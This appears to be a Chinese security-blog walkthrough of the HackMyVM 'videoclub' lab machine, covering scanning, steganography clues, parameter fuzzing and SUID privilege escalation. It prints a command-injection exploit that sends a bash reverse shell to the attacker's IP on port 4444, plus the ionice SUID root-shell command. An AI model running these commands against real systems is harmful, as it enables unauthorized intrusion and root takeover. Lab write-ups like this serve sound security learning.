freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次hackmyvm综合靶场的渗透测试-videoclub
记一次hackmyvm综合靶场的渗透测试-videoclub
知非 2022-04-27 09:21:42 101296
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!


信息收集阶段

Kali靶机:192.168.1.128

nmap -sn 192.168.1.0/24

1651022080_62689900e6f92aa75ef78.png!small?1651022081434

nmap -A -p- 192.168.1.82

1651022091_6268990b8bdc7bd02ee57.png!small?1651022092025

开启了22端口和3377端口,可见3377端口有东西!访问下看看

http://192.168.1.82:3377/

1651022100_62689914af8287bed2be7.png!small?1651022101165

居然是个炫酷的视频网站,6666!

我们查看一下网站的源码:

源码有两处注释:

1651022120_6268992880d27d107983e.png!small?1651022120883

结尾处:

Wellcome to the video club Margarita, the rules are clear, you pay every minute it takes to return a DVD.

你还DVD的每一分钟都要付钱,可能这个DVD指代目录信息,所以我们扫描一下目录!

扫下目录看看:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.82:3377 -x php,html,txt

1651022131_62689933452e82037425e.png!small?1651022131731

访问下:以下目录

http://192.168.1.82:3377/robots.txt

小丑下面有一串不知道啥的代码!!

1651022137_62689939e44b5c05e70bd.png!small?1651022138422

最底下:有一个文件!!!

1651022146_62689942819a8764ad485.png!small?1651022146956

http://192.168.1.82:3377/list-defaulters.txt

访问这个文件:

1651022153_626899493a36fa539fe83.png!small?1651022153689

像是一系列的用户名清单!!!!

但是仔细看,可以发现亿些端倪!!!

1651022160_626899501ed0f13a5ce62.png!small?1651022160466

其中exiftool是一款图片隐写软件,而steg hide明确的告诉你这是图片隐写,可是到底是哪张图片是隐写的呢?

以上可以看到一个image的目录泄露!!!

http://192.168.1.82:3377/images/

1651022178_6268996234fae88ad38c2.png!small?1651022178670

漏洞利用阶段

hackers.jpg 试试这个!!!

exiftool hackers.jpg

1651022208_626899803a4e438489764.png!small?1651022208683

这是个啥没搜到!!!试试目录,也灭有,看看其他图片吧!!

看来是需要把所有的图片和视频都进行解密了!!!

通过解密的图片和视频,可以形成一个字典!!!

zerial_killer:bien_cabron

LostDVD:k1nd3rs

LostDVD=t3rm1n4t0r

LostDVD=m14_w4ll4c3

LostDVD=c0n3h34ds

secret_film:c0ntr0l

bien_cabron

k1nd3rs

t3rm1n4t0r

m14_w4ll4c3

c0n3h34ds

c0ntr0l

扫一遍目录:

gobuster dir -w list.txt -u http://192.168.1.82:3377 -x php,html,txt,phtml,sh,zip,bak

1651022219_6268998bd33caeda5a24f.png!small?1651022220439

访问以下看看:

http://192.168.1.82:3377/m14_w4ll4c3

低俗小说

http://192.168.1.82:3377/c0n3h34ds

不知道

http://192.168.1.82:3377/t3rm1n4t0r

终结者

http://192.168.1.82:3377/c0ntr0l.php

空的?有戏

http://192.168.1.82:3377/k1nd3rs

什么鬼?

似乎需要FUZZ这个

C0ntr0l的参数,但是字典在哪呢?

别忘了,我们还有这个文件list-defaulters.txt

k3v1n

sn4k3

d4t4s3c

g4t3s

st4llm4n

t1m

exif

tool

n0n4m3

sofia

lacashita

c4r4c0n0

sml

a1t0rmenta

frodo

f1ynn

nolose

r1tm4tica

l0w

steg

hide

fresh

neo

aquaman

w0nderw0m4n

这里采用gobuster的fuzz模式:

1651022256_626899b0cc2ad11b8db82.png!small?1651022257496

gobuster fuzz --url http://192.168.1.82:3377/c0ntr0l.php?FUZZ=id -w dic.txt

1651022263_626899b7cb6bad7113b33.png!small?1651022264778

找到参数了?

http://192.168.1.82:3377/c0ntr0l.php?f1ynn=id

而且这是一个命令执行的参数:

1651022282_626899ca2951ee699e080.png!small?1651022282565

我们这里需要它反弹一个SHELL!!

接着,我们通过这个文件向攻击机反弹一个bash!!!!

执行命令:

bash -c 'bash -i >& /dev/tcp/192.168.1.128/4444 0>&1'

在URL传递中需要进行URL编码:

bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.128%2F4444%200%3E%261%27

在kali上监听4444端口!!!!已成功反弹!!!

1651022296_626899d869ff23539a5ed.png!small?1651022296827

也可以在kali上利用python3获取伪终端!!!

1651022301_626899dd4bfd2f252538e.png!small

只有这两个用户!!!!

1651022312_626899e8513cdb5ef920f.png!small

第一个flag:

ad7**********c9

权限提升阶段

接下来需要提权到root!!!!

find / -perm -u=s -type f 2>/dev/null

1651022340_62689a04780e88e7eb998.png!small?1651022340949

老思路,利用SUID

列举SUID,我发现/home/librarian/ionice,现在让我们检查gtfobins的漏洞。

1651022346_62689a0a12eaaf8310f73.png!small?1651022346574

/home/librarian/ionice /bin/sh -p

1651022350_62689a0ea9c1760ea8790.png!small?1651022351175

正常的找法是不行了!!!

find / -name root.txt 2>/dev/null

1651022359_62689a174ea4539594d2a.png!small?1651022359767

最后的flag!!!!

7ff2*************b18


# 渗透测试 # web安全 # 网络安全技术 # 靶场平台 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 知非 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
hackmyvm靶场实战
相关推荐
攻击技术研判 |利用开源软件包安装程序Chocolately落地的新型后门
攻击技术研判 |利用开源软件包安装程序Chocolately落地的新型后门

网络安全

本文将就事件中出现的相关技术进行分析阐述。

绿盟科技

140958围观 2022-04-28

网络安全专业术语英文缩写对照表 原创
网络安全专业术语英文缩写对照表

网络安全

因在阅读文献过程中经常遇到各种专业缩写,所以把各种缩写总结了一下。

李逍遥g

327357围观  · 3收藏  · 5喜欢 2022-04-28

KnownDll Herpaderping实现无文件进程注入
KnownDll Herpaderping实现无文件进程注入

网络安全

本文是对 Windows Process Injection: KnownDlls Cache Poisoning的整理学习,并与Herpa...

绿盟科技

204808围观 2022-04-28

浅析文件包含
浅析文件包含

Web安全

近期发现文件包含这方面几乎一窍不通,特来对此漏洞进行学习,并总结如下,希望能对正在学习文件包含的人有些许帮助。

quan9i

138755围观  · 3收藏  · 48喜欢 2022-04-28

乌特拉安全实验室丨记录一次从弱口令到sql注入拿shell
乌特拉安全实验室丨记录一次从弱口令到sql注入拿shell

漏洞

有段时间一直在挖 edu,挖到一个从普通用户权限到 getshell 的站,觉得挺有意义的,记录了一下,也学到了挺多知识的,但中间也出现了些...

FreeBuf_377712

189184围观 2022-05-10

知非 LV.8
这家伙太懒了,还未填写个人描述!
  • 125 文章数
  • 40 关注者
一个月学习通过商用密码测评师的经验分享
2025-01-09
等保2.0之AIX安全计算环境测评指导书
2023-05-10
记一次hackmyvm综合靶场的渗透测试-warez
2022-04-27
文章目录
前言
    信息收集阶段
      漏洞利用阶段
        权限提升阶段